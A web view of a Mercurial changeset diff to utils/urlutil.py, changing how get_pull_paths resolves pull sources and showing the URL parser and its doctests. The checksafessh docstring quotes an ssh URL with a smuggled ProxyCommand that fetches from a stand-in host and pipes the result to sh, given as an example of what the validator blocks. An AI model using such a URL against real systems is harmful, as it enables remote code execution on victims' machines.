##// END OF EJS Templates
urlutil: remove usage of `ui.expandpath` in `get_pull_paths`...
marmoute -
r47724:afdd7c47 default
parent child Browse files
Show More
@@ -1,754 +1,762
1 # utils.urlutil - code related to [paths] management
1 # utils.urlutil - code related to [paths] management
2 #
2 #
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 import os
7 import os
8 import re as remod
8 import re as remod
9 import socket
9 import socket
10
10
11 from ..i18n import _
11 from ..i18n import _
12 from ..pycompat import (
12 from ..pycompat import (
13 getattr,
13 getattr,
14 setattr,
14 setattr,
15 )
15 )
16 from .. import (
16 from .. import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pycompat,
19 pycompat,
20 urllibcompat,
20 urllibcompat,
21 )
21 )
22
22
23
23
24 if pycompat.TYPE_CHECKING:
24 if pycompat.TYPE_CHECKING:
25 from typing import (
25 from typing import (
26 Union,
26 Union,
27 )
27 )
28
28
29 urlreq = urllibcompat.urlreq
29 urlreq = urllibcompat.urlreq
30
30
31
31
32 def getport(port):
32 def getport(port):
33 # type: (Union[bytes, int]) -> int
33 # type: (Union[bytes, int]) -> int
34 """Return the port for a given network service.
34 """Return the port for a given network service.
35
35
36 If port is an integer, it's returned as is. If it's a string, it's
36 If port is an integer, it's returned as is. If it's a string, it's
37 looked up using socket.getservbyname(). If there's no matching
37 looked up using socket.getservbyname(). If there's no matching
38 service, error.Abort is raised.
38 service, error.Abort is raised.
39 """
39 """
40 try:
40 try:
41 return int(port)
41 return int(port)
42 except ValueError:
42 except ValueError:
43 pass
43 pass
44
44
45 try:
45 try:
46 return socket.getservbyname(pycompat.sysstr(port))
46 return socket.getservbyname(pycompat.sysstr(port))
47 except socket.error:
47 except socket.error:
48 raise error.Abort(
48 raise error.Abort(
49 _(b"no port number associated with service '%s'") % port
49 _(b"no port number associated with service '%s'") % port
50 )
50 )
51
51
52
52
53 class url(object):
53 class url(object):
54 r"""Reliable URL parser.
54 r"""Reliable URL parser.
55
55
56 This parses URLs and provides attributes for the following
56 This parses URLs and provides attributes for the following
57 components:
57 components:
58
58
59 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
59 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
60
60
61 Missing components are set to None. The only exception is
61 Missing components are set to None. The only exception is
62 fragment, which is set to '' if present but empty.
62 fragment, which is set to '' if present but empty.
63
63
64 If parsefragment is False, fragment is included in query. If
64 If parsefragment is False, fragment is included in query. If
65 parsequery is False, query is included in path. If both are
65 parsequery is False, query is included in path. If both are
66 False, both fragment and query are included in path.
66 False, both fragment and query are included in path.
67
67
68 See http://www.ietf.org/rfc/rfc2396.txt for more information.
68 See http://www.ietf.org/rfc/rfc2396.txt for more information.
69
69
70 Note that for backward compatibility reasons, bundle URLs do not
70 Note that for backward compatibility reasons, bundle URLs do not
71 take host names. That means 'bundle://../' has a path of '../'.
71 take host names. That means 'bundle://../' has a path of '../'.
72
72
73 Examples:
73 Examples:
74
74
75 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
75 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
76 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
76 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
77 >>> url(b'ssh://[::1]:2200//home/joe/repo')
77 >>> url(b'ssh://[::1]:2200//home/joe/repo')
78 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
78 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
79 >>> url(b'file:///home/joe/repo')
79 >>> url(b'file:///home/joe/repo')
80 <url scheme: 'file', path: '/home/joe/repo'>
80 <url scheme: 'file', path: '/home/joe/repo'>
81 >>> url(b'file:///c:/temp/foo/')
81 >>> url(b'file:///c:/temp/foo/')
82 <url scheme: 'file', path: 'c:/temp/foo/'>
82 <url scheme: 'file', path: 'c:/temp/foo/'>
83 >>> url(b'bundle:foo')
83 >>> url(b'bundle:foo')
84 <url scheme: 'bundle', path: 'foo'>
84 <url scheme: 'bundle', path: 'foo'>
85 >>> url(b'bundle://../foo')
85 >>> url(b'bundle://../foo')
86 <url scheme: 'bundle', path: '../foo'>
86 <url scheme: 'bundle', path: '../foo'>
87 >>> url(br'c:\foo\bar')
87 >>> url(br'c:\foo\bar')
88 <url path: 'c:\\foo\\bar'>
88 <url path: 'c:\\foo\\bar'>
89 >>> url(br'\\blah\blah\blah')
89 >>> url(br'\\blah\blah\blah')
90 <url path: '\\\\blah\\blah\\blah'>
90 <url path: '\\\\blah\\blah\\blah'>
91 >>> url(br'\\blah\blah\blah#baz')
91 >>> url(br'\\blah\blah\blah#baz')
92 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
92 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
93 >>> url(br'file:///C:\users\me')
93 >>> url(br'file:///C:\users\me')
94 <url scheme: 'file', path: 'C:\\users\\me'>
94 <url scheme: 'file', path: 'C:\\users\\me'>
95
95
96 Authentication credentials:
96 Authentication credentials:
97
97
98 >>> url(b'ssh://joe:xyz@x/repo')
98 >>> url(b'ssh://joe:xyz@x/repo')
99 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
99 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
100 >>> url(b'ssh://joe@x/repo')
100 >>> url(b'ssh://joe@x/repo')
101 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
101 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
102
102
103 Query strings and fragments:
103 Query strings and fragments:
104
104
105 >>> url(b'http://host/a?b#c')
105 >>> url(b'http://host/a?b#c')
106 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
106 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
107 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
107 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
108 <url scheme: 'http', host: 'host', path: 'a?b#c'>
108 <url scheme: 'http', host: 'host', path: 'a?b#c'>
109
109
110 Empty path:
110 Empty path:
111
111
112 >>> url(b'')
112 >>> url(b'')
113 <url path: ''>
113 <url path: ''>
114 >>> url(b'#a')
114 >>> url(b'#a')
115 <url path: '', fragment: 'a'>
115 <url path: '', fragment: 'a'>
116 >>> url(b'http://host/')
116 >>> url(b'http://host/')
117 <url scheme: 'http', host: 'host', path: ''>
117 <url scheme: 'http', host: 'host', path: ''>
118 >>> url(b'http://host/#a')
118 >>> url(b'http://host/#a')
119 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
119 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
120
120
121 Only scheme:
121 Only scheme:
122
122
123 >>> url(b'http:')
123 >>> url(b'http:')
124 <url scheme: 'http'>
124 <url scheme: 'http'>
125 """
125 """
126
126
127 _safechars = b"!~*'()+"
127 _safechars = b"!~*'()+"
128 _safepchars = b"/!~*'()+:\\"
128 _safepchars = b"/!~*'()+:\\"
129 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
129 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
130
130
131 def __init__(self, path, parsequery=True, parsefragment=True):
131 def __init__(self, path, parsequery=True, parsefragment=True):
132 # type: (bytes, bool, bool) -> None
132 # type: (bytes, bool, bool) -> None
133 # We slowly chomp away at path until we have only the path left
133 # We slowly chomp away at path until we have only the path left
134 self.scheme = self.user = self.passwd = self.host = None
134 self.scheme = self.user = self.passwd = self.host = None
135 self.port = self.path = self.query = self.fragment = None
135 self.port = self.path = self.query = self.fragment = None
136 self._localpath = True
136 self._localpath = True
137 self._hostport = b''
137 self._hostport = b''
138 self._origpath = path
138 self._origpath = path
139
139
140 if parsefragment and b'#' in path:
140 if parsefragment and b'#' in path:
141 path, self.fragment = path.split(b'#', 1)
141 path, self.fragment = path.split(b'#', 1)
142
142
143 # special case for Windows drive letters and UNC paths
143 # special case for Windows drive letters and UNC paths
144 if hasdriveletter(path) or path.startswith(b'\\\\'):
144 if hasdriveletter(path) or path.startswith(b'\\\\'):
145 self.path = path
145 self.path = path
146 return
146 return
147
147
148 # For compatibility reasons, we can't handle bundle paths as
148 # For compatibility reasons, we can't handle bundle paths as
149 # normal URLS
149 # normal URLS
150 if path.startswith(b'bundle:'):
150 if path.startswith(b'bundle:'):
151 self.scheme = b'bundle'
151 self.scheme = b'bundle'
152 path = path[7:]
152 path = path[7:]
153 if path.startswith(b'//'):
153 if path.startswith(b'//'):
154 path = path[2:]
154 path = path[2:]
155 self.path = path
155 self.path = path
156 return
156 return
157
157
158 if self._matchscheme(path):
158 if self._matchscheme(path):
159 parts = path.split(b':', 1)
159 parts = path.split(b':', 1)
160 if parts[0]:
160 if parts[0]:
161 self.scheme, path = parts
161 self.scheme, path = parts
162 self._localpath = False
162 self._localpath = False
163
163
164 if not path:
164 if not path:
165 path = None
165 path = None
166 if self._localpath:
166 if self._localpath:
167 self.path = b''
167 self.path = b''
168 return
168 return
169 else:
169 else:
170 if self._localpath:
170 if self._localpath:
171 self.path = path
171 self.path = path
172 return
172 return
173
173
174 if parsequery and b'?' in path:
174 if parsequery and b'?' in path:
175 path, self.query = path.split(b'?', 1)
175 path, self.query = path.split(b'?', 1)
176 if not path:
176 if not path:
177 path = None
177 path = None
178 if not self.query:
178 if not self.query:
179 self.query = None
179 self.query = None
180
180
181 # // is required to specify a host/authority
181 # // is required to specify a host/authority
182 if path and path.startswith(b'//'):
182 if path and path.startswith(b'//'):
183 parts = path[2:].split(b'/', 1)
183 parts = path[2:].split(b'/', 1)
184 if len(parts) > 1:
184 if len(parts) > 1:
185 self.host, path = parts
185 self.host, path = parts
186 else:
186 else:
187 self.host = parts[0]
187 self.host = parts[0]
188 path = None
188 path = None
189 if not self.host:
189 if not self.host:
190 self.host = None
190 self.host = None
191 # path of file:///d is /d
191 # path of file:///d is /d
192 # path of file:///d:/ is d:/, not /d:/
192 # path of file:///d:/ is d:/, not /d:/
193 if path and not hasdriveletter(path):
193 if path and not hasdriveletter(path):
194 path = b'/' + path
194 path = b'/' + path
195
195
196 if self.host and b'@' in self.host:
196 if self.host and b'@' in self.host:
197 self.user, self.host = self.host.rsplit(b'@', 1)
197 self.user, self.host = self.host.rsplit(b'@', 1)
198 if b':' in self.user:
198 if b':' in self.user:
199 self.user, self.passwd = self.user.split(b':', 1)
199 self.user, self.passwd = self.user.split(b':', 1)
200 if not self.host:
200 if not self.host:
201 self.host = None
201 self.host = None
202
202
203 # Don't split on colons in IPv6 addresses without ports
203 # Don't split on colons in IPv6 addresses without ports
204 if (
204 if (
205 self.host
205 self.host
206 and b':' in self.host
206 and b':' in self.host
207 and not (
207 and not (
208 self.host.startswith(b'[') and self.host.endswith(b']')
208 self.host.startswith(b'[') and self.host.endswith(b']')
209 )
209 )
210 ):
210 ):
211 self._hostport = self.host
211 self._hostport = self.host
212 self.host, self.port = self.host.rsplit(b':', 1)
212 self.host, self.port = self.host.rsplit(b':', 1)
213 if not self.host:
213 if not self.host:
214 self.host = None
214 self.host = None
215
215
216 if (
216 if (
217 self.host
217 self.host
218 and self.scheme == b'file'
218 and self.scheme == b'file'
219 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
219 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
220 ):
220 ):
221 raise error.Abort(
221 raise error.Abort(
222 _(b'file:// URLs can only refer to localhost')
222 _(b'file:// URLs can only refer to localhost')
223 )
223 )
224
224
225 self.path = path
225 self.path = path
226
226
227 # leave the query string escaped
227 # leave the query string escaped
228 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
228 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
229 v = getattr(self, a)
229 v = getattr(self, a)
230 if v is not None:
230 if v is not None:
231 setattr(self, a, urlreq.unquote(v))
231 setattr(self, a, urlreq.unquote(v))
232
232
233 def copy(self):
233 def copy(self):
234 u = url(b'temporary useless value')
234 u = url(b'temporary useless value')
235 u.path = self.path
235 u.path = self.path
236 u.scheme = self.scheme
236 u.scheme = self.scheme
237 u.user = self.user
237 u.user = self.user
238 u.passwd = self.passwd
238 u.passwd = self.passwd
239 u.host = self.host
239 u.host = self.host
240 u.path = self.path
240 u.path = self.path
241 u.query = self.query
241 u.query = self.query
242 u.fragment = self.fragment
242 u.fragment = self.fragment
243 u._localpath = self._localpath
243 u._localpath = self._localpath
244 u._hostport = self._hostport
244 u._hostport = self._hostport
245 u._origpath = self._origpath
245 u._origpath = self._origpath
246 return u
246 return u
247
247
248 @encoding.strmethod
248 @encoding.strmethod
249 def __repr__(self):
249 def __repr__(self):
250 attrs = []
250 attrs = []
251 for a in (
251 for a in (
252 b'scheme',
252 b'scheme',
253 b'user',
253 b'user',
254 b'passwd',
254 b'passwd',
255 b'host',
255 b'host',
256 b'port',
256 b'port',
257 b'path',
257 b'path',
258 b'query',
258 b'query',
259 b'fragment',
259 b'fragment',
260 ):
260 ):
261 v = getattr(self, a)
261 v = getattr(self, a)
262 if v is not None:
262 if v is not None:
263 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
263 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
264 return b'<url %s>' % b', '.join(attrs)
264 return b'<url %s>' % b', '.join(attrs)
265
265
266 def __bytes__(self):
266 def __bytes__(self):
267 r"""Join the URL's components back into a URL string.
267 r"""Join the URL's components back into a URL string.
268
268
269 Examples:
269 Examples:
270
270
271 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
271 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
272 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
272 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
273 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
273 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
274 'http://user:pw@host:80/?foo=bar&baz=42'
274 'http://user:pw@host:80/?foo=bar&baz=42'
275 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
275 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
276 'http://user:pw@host:80/?foo=bar%3dbaz'
276 'http://user:pw@host:80/?foo=bar%3dbaz'
277 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
277 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
278 'ssh://user:pw@[::1]:2200//home/joe#'
278 'ssh://user:pw@[::1]:2200//home/joe#'
279 >>> bytes(url(b'http://localhost:80//'))
279 >>> bytes(url(b'http://localhost:80//'))
280 'http://localhost:80//'
280 'http://localhost:80//'
281 >>> bytes(url(b'http://localhost:80/'))
281 >>> bytes(url(b'http://localhost:80/'))
282 'http://localhost:80/'
282 'http://localhost:80/'
283 >>> bytes(url(b'http://localhost:80'))
283 >>> bytes(url(b'http://localhost:80'))
284 'http://localhost:80/'
284 'http://localhost:80/'
285 >>> bytes(url(b'bundle:foo'))
285 >>> bytes(url(b'bundle:foo'))
286 'bundle:foo'
286 'bundle:foo'
287 >>> bytes(url(b'bundle://../foo'))
287 >>> bytes(url(b'bundle://../foo'))
288 'bundle:../foo'
288 'bundle:../foo'
289 >>> bytes(url(b'path'))
289 >>> bytes(url(b'path'))
290 'path'
290 'path'
291 >>> bytes(url(b'file:///tmp/foo/bar'))
291 >>> bytes(url(b'file:///tmp/foo/bar'))
292 'file:///tmp/foo/bar'
292 'file:///tmp/foo/bar'
293 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
293 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
294 'file:///c:/tmp/foo/bar'
294 'file:///c:/tmp/foo/bar'
295 >>> print(url(br'bundle:foo\bar'))
295 >>> print(url(br'bundle:foo\bar'))
296 bundle:foo\bar
296 bundle:foo\bar
297 >>> print(url(br'file:///D:\data\hg'))
297 >>> print(url(br'file:///D:\data\hg'))
298 file:///D:\data\hg
298 file:///D:\data\hg
299 """
299 """
300 if self._localpath:
300 if self._localpath:
301 s = self.path
301 s = self.path
302 if self.scheme == b'bundle':
302 if self.scheme == b'bundle':
303 s = b'bundle:' + s
303 s = b'bundle:' + s
304 if self.fragment:
304 if self.fragment:
305 s += b'#' + self.fragment
305 s += b'#' + self.fragment
306 return s
306 return s
307
307
308 s = self.scheme + b':'
308 s = self.scheme + b':'
309 if self.user or self.passwd or self.host:
309 if self.user or self.passwd or self.host:
310 s += b'//'
310 s += b'//'
311 elif self.scheme and (
311 elif self.scheme and (
312 not self.path
312 not self.path
313 or self.path.startswith(b'/')
313 or self.path.startswith(b'/')
314 or hasdriveletter(self.path)
314 or hasdriveletter(self.path)
315 ):
315 ):
316 s += b'//'
316 s += b'//'
317 if hasdriveletter(self.path):
317 if hasdriveletter(self.path):
318 s += b'/'
318 s += b'/'
319 if self.user:
319 if self.user:
320 s += urlreq.quote(self.user, safe=self._safechars)
320 s += urlreq.quote(self.user, safe=self._safechars)
321 if self.passwd:
321 if self.passwd:
322 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
322 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
323 if self.user or self.passwd:
323 if self.user or self.passwd:
324 s += b'@'
324 s += b'@'
325 if self.host:
325 if self.host:
326 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
326 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
327 s += urlreq.quote(self.host)
327 s += urlreq.quote(self.host)
328 else:
328 else:
329 s += self.host
329 s += self.host
330 if self.port:
330 if self.port:
331 s += b':' + urlreq.quote(self.port)
331 s += b':' + urlreq.quote(self.port)
332 if self.host:
332 if self.host:
333 s += b'/'
333 s += b'/'
334 if self.path:
334 if self.path:
335 # TODO: similar to the query string, we should not unescape the
335 # TODO: similar to the query string, we should not unescape the
336 # path when we store it, the path might contain '%2f' = '/',
336 # path when we store it, the path might contain '%2f' = '/',
337 # which we should *not* escape.
337 # which we should *not* escape.
338 s += urlreq.quote(self.path, safe=self._safepchars)
338 s += urlreq.quote(self.path, safe=self._safepchars)
339 if self.query:
339 if self.query:
340 # we store the query in escaped form.
340 # we store the query in escaped form.
341 s += b'?' + self.query
341 s += b'?' + self.query
342 if self.fragment is not None:
342 if self.fragment is not None:
343 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
343 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
344 return s
344 return s
345
345
346 __str__ = encoding.strmethod(__bytes__)
346 __str__ = encoding.strmethod(__bytes__)
347
347
348 def authinfo(self):
348 def authinfo(self):
349 user, passwd = self.user, self.passwd
349 user, passwd = self.user, self.passwd
350 try:
350 try:
351 self.user, self.passwd = None, None
351 self.user, self.passwd = None, None
352 s = bytes(self)
352 s = bytes(self)
353 finally:
353 finally:
354 self.user, self.passwd = user, passwd
354 self.user, self.passwd = user, passwd
355 if not self.user:
355 if not self.user:
356 return (s, None)
356 return (s, None)
357 # authinfo[1] is passed to urllib2 password manager, and its
357 # authinfo[1] is passed to urllib2 password manager, and its
358 # URIs must not contain credentials. The host is passed in the
358 # URIs must not contain credentials. The host is passed in the
359 # URIs list because Python < 2.4.3 uses only that to search for
359 # URIs list because Python < 2.4.3 uses only that to search for
360 # a password.
360 # a password.
361 return (s, (None, (s, self.host), self.user, self.passwd or b''))
361 return (s, (None, (s, self.host), self.user, self.passwd or b''))
362
362
363 def isabs(self):
363 def isabs(self):
364 if self.scheme and self.scheme != b'file':
364 if self.scheme and self.scheme != b'file':
365 return True # remote URL
365 return True # remote URL
366 if hasdriveletter(self.path):
366 if hasdriveletter(self.path):
367 return True # absolute for our purposes - can't be joined()
367 return True # absolute for our purposes - can't be joined()
368 if self.path.startswith(br'\\'):
368 if self.path.startswith(br'\\'):
369 return True # Windows UNC path
369 return True # Windows UNC path
370 if self.path.startswith(b'/'):
370 if self.path.startswith(b'/'):
371 return True # POSIX-style
371 return True # POSIX-style
372 return False
372 return False
373
373
374 def localpath(self):
374 def localpath(self):
375 # type: () -> bytes
375 # type: () -> bytes
376 if self.scheme == b'file' or self.scheme == b'bundle':
376 if self.scheme == b'file' or self.scheme == b'bundle':
377 path = self.path or b'/'
377 path = self.path or b'/'
378 # For Windows, we need to promote hosts containing drive
378 # For Windows, we need to promote hosts containing drive
379 # letters to paths with drive letters.
379 # letters to paths with drive letters.
380 if hasdriveletter(self._hostport):
380 if hasdriveletter(self._hostport):
381 path = self._hostport + b'/' + self.path
381 path = self._hostport + b'/' + self.path
382 elif (
382 elif (
383 self.host is not None and self.path and not hasdriveletter(path)
383 self.host is not None and self.path and not hasdriveletter(path)
384 ):
384 ):
385 path = b'/' + path
385 path = b'/' + path
386 return path
386 return path
387 return self._origpath
387 return self._origpath
388
388
389 def islocal(self):
389 def islocal(self):
390 '''whether localpath will return something that posixfile can open'''
390 '''whether localpath will return something that posixfile can open'''
391 return (
391 return (
392 not self.scheme
392 not self.scheme
393 or self.scheme == b'file'
393 or self.scheme == b'file'
394 or self.scheme == b'bundle'
394 or self.scheme == b'bundle'
395 )
395 )
396
396
397
397
398 def hasscheme(path):
398 def hasscheme(path):
399 # type: (bytes) -> bool
399 # type: (bytes) -> bool
400 return bool(url(path).scheme) # cast to help pytype
400 return bool(url(path).scheme) # cast to help pytype
401
401
402
402
403 def hasdriveletter(path):
403 def hasdriveletter(path):
404 # type: (bytes) -> bool
404 # type: (bytes) -> bool
405 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
405 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
406
406
407
407
408 def urllocalpath(path):
408 def urllocalpath(path):
409 # type: (bytes) -> bytes
409 # type: (bytes) -> bytes
410 return url(path, parsequery=False, parsefragment=False).localpath()
410 return url(path, parsequery=False, parsefragment=False).localpath()
411
411
412
412
413 def checksafessh(path):
413 def checksafessh(path):
414 # type: (bytes) -> None
414 # type: (bytes) -> None
415 """check if a path / url is a potentially unsafe ssh exploit (SEC)
415 """check if a path / url is a potentially unsafe ssh exploit (SEC)
416
416
417 This is a sanity check for ssh urls. ssh will parse the first item as
417 This is a sanity check for ssh urls. ssh will parse the first item as
418 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
418 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
419 Let's prevent these potentially exploited urls entirely and warn the
419 Let's prevent these potentially exploited urls entirely and warn the
420 user.
420 user.
421
421
422 Raises an error.Abort when the url is unsafe.
422 Raises an error.Abort when the url is unsafe.
423 """
423 """
424 path = urlreq.unquote(path)
424 path = urlreq.unquote(path)
425 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
425 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
426 raise error.Abort(
426 raise error.Abort(
427 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
427 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
428 )
428 )
429
429
430
430
431 def hidepassword(u):
431 def hidepassword(u):
432 # type: (bytes) -> bytes
432 # type: (bytes) -> bytes
433 '''hide user credential in a url string'''
433 '''hide user credential in a url string'''
434 u = url(u)
434 u = url(u)
435 if u.passwd:
435 if u.passwd:
436 u.passwd = b'***'
436 u.passwd = b'***'
437 return bytes(u)
437 return bytes(u)
438
438
439
439
440 def removeauth(u):
440 def removeauth(u):
441 # type: (bytes) -> bytes
441 # type: (bytes) -> bytes
442 '''remove all authentication information from a url string'''
442 '''remove all authentication information from a url string'''
443 u = url(u)
443 u = url(u)
444 u.user = u.passwd = None
444 u.user = u.passwd = None
445 return bytes(u)
445 return bytes(u)
446
446
447
447
448 def get_push_paths(repo, ui, dests):
448 def get_push_paths(repo, ui, dests):
449 """yields all the `path` selected as push destination by `dests`"""
449 """yields all the `path` selected as push destination by `dests`"""
450 if not dests:
450 if not dests:
451 if b'default-push' in ui.paths:
451 if b'default-push' in ui.paths:
452 yield ui.paths[b'default-push']
452 yield ui.paths[b'default-push']
453 elif b'default' in ui.paths:
453 elif b'default' in ui.paths:
454 yield ui.paths[b'default']
454 yield ui.paths[b'default']
455 else:
455 else:
456 raise error.ConfigError(
456 raise error.ConfigError(
457 _(b'default repository not configured!'),
457 _(b'default repository not configured!'),
458 hint=_(b"see 'hg help config.paths'"),
458 hint=_(b"see 'hg help config.paths'"),
459 )
459 )
460 else:
460 else:
461 for dest in dests:
461 for dest in dests:
462 yield ui.getpath(dest)
462 yield ui.getpath(dest)
463
463
464
464
465 def get_pull_paths(repo, ui, sources, default_branches=()):
465 def get_pull_paths(repo, ui, sources, default_branches=()):
466 """yields all the `(path, branch)` selected as pull source by `sources`"""
466 """yields all the `(path, branch)` selected as pull source by `sources`"""
467 if not sources:
467 if not sources:
468 sources = [b'default']
468 sources = [b'default']
469 for source in sources:
469 for source in sources:
470 url = ui.expandpath(source)
470 if source in ui.paths:
471 url = ui.paths[source].rawloc
472 else:
473 # Try to resolve as a local path or URI.
474 try:
475 # we pass the ui instance are warning might need to be issued
476 url = path(ui, None, rawloc=source).rawloc
477 except ValueError:
478 url = source
471 yield parseurl(url, default_branches)
479 yield parseurl(url, default_branches)
472
480
473
481
474 def get_unique_push_path(action, repo, ui, dest=None):
482 def get_unique_push_path(action, repo, ui, dest=None):
475 """return a unique `path` or abort if multiple are found
483 """return a unique `path` or abort if multiple are found
476
484
477 This is useful for command and action that does not support multiple
485 This is useful for command and action that does not support multiple
478 destination (yet).
486 destination (yet).
479
487
480 Note that for now, we cannot get multiple destination so this function is "trivial".
488 Note that for now, we cannot get multiple destination so this function is "trivial".
481
489
482 The `action` parameter will be used for the error message.
490 The `action` parameter will be used for the error message.
483 """
491 """
484 if dest is None:
492 if dest is None:
485 dests = []
493 dests = []
486 else:
494 else:
487 dests = [dest]
495 dests = [dest]
488 dests = list(get_push_paths(repo, ui, dests))
496 dests = list(get_push_paths(repo, ui, dests))
489 assert len(dests) == 1
497 assert len(dests) == 1
490 return dests[0]
498 return dests[0]
491
499
492
500
493 def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
501 def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
494 """return a unique `(path, branch)` or abort if multiple are found
502 """return a unique `(path, branch)` or abort if multiple are found
495
503
496 This is useful for command and action that does not support multiple
504 This is useful for command and action that does not support multiple
497 destination (yet).
505 destination (yet).
498
506
499 Note that for now, we cannot get multiple destination so this function is "trivial".
507 Note that for now, we cannot get multiple destination so this function is "trivial".
500
508
501 The `action` parameter will be used for the error message.
509 The `action` parameter will be used for the error message.
502 """
510 """
503 if source is None:
511 if source is None:
504 source = b'default'
512 source = b'default'
505 url = ui.expandpath(source)
513 url = ui.expandpath(source)
506 return parseurl(url, default_branches)
514 return parseurl(url, default_branches)
507
515
508
516
509 def get_clone_path(ui, source, default_branches=()):
517 def get_clone_path(ui, source, default_branches=()):
510 """return the `(origsource, path, branch)` selected as clone source"""
518 """return the `(origsource, path, branch)` selected as clone source"""
511 url = ui.expandpath(source)
519 url = ui.expandpath(source)
512 path, branch = parseurl(url, default_branches)
520 path, branch = parseurl(url, default_branches)
513 return url, path, branch
521 return url, path, branch
514
522
515
523
516 def parseurl(path, branches=None):
524 def parseurl(path, branches=None):
517 '''parse url#branch, returning (url, (branch, branches))'''
525 '''parse url#branch, returning (url, (branch, branches))'''
518 u = url(path)
526 u = url(path)
519 branch = None
527 branch = None
520 if u.fragment:
528 if u.fragment:
521 branch = u.fragment
529 branch = u.fragment
522 u.fragment = None
530 u.fragment = None
523 return bytes(u), (branch, branches or [])
531 return bytes(u), (branch, branches or [])
524
532
525
533
526 class paths(dict):
534 class paths(dict):
527 """Represents a collection of paths and their configs.
535 """Represents a collection of paths and their configs.
528
536
529 Data is initially derived from ui instances and the config files they have
537 Data is initially derived from ui instances and the config files they have
530 loaded.
538 loaded.
531 """
539 """
532
540
533 def __init__(self, ui):
541 def __init__(self, ui):
534 dict.__init__(self)
542 dict.__init__(self)
535
543
536 for name, loc in ui.configitems(b'paths', ignoresub=True):
544 for name, loc in ui.configitems(b'paths', ignoresub=True):
537 # No location is the same as not existing.
545 # No location is the same as not existing.
538 if not loc:
546 if not loc:
539 continue
547 continue
540 loc, sub_opts = ui.configsuboptions(b'paths', name)
548 loc, sub_opts = ui.configsuboptions(b'paths', name)
541 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
549 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
542
550
543 for name, p in sorted(self.items()):
551 for name, p in sorted(self.items()):
544 p.chain_path(ui, self)
552 p.chain_path(ui, self)
545
553
546 def getpath(self, ui, name, default=None):
554 def getpath(self, ui, name, default=None):
547 """Return a ``path`` from a string, falling back to default.
555 """Return a ``path`` from a string, falling back to default.
548
556
549 ``name`` can be a named path or locations. Locations are filesystem
557 ``name`` can be a named path or locations. Locations are filesystem
550 paths or URIs.
558 paths or URIs.
551
559
552 Returns None if ``name`` is not a registered path, a URI, or a local
560 Returns None if ``name`` is not a registered path, a URI, or a local
553 path to a repo.
561 path to a repo.
554 """
562 """
555 # Only fall back to default if no path was requested.
563 # Only fall back to default if no path was requested.
556 if name is None:
564 if name is None:
557 if not default:
565 if not default:
558 default = ()
566 default = ()
559 elif not isinstance(default, (tuple, list)):
567 elif not isinstance(default, (tuple, list)):
560 default = (default,)
568 default = (default,)
561 for k in default:
569 for k in default:
562 try:
570 try:
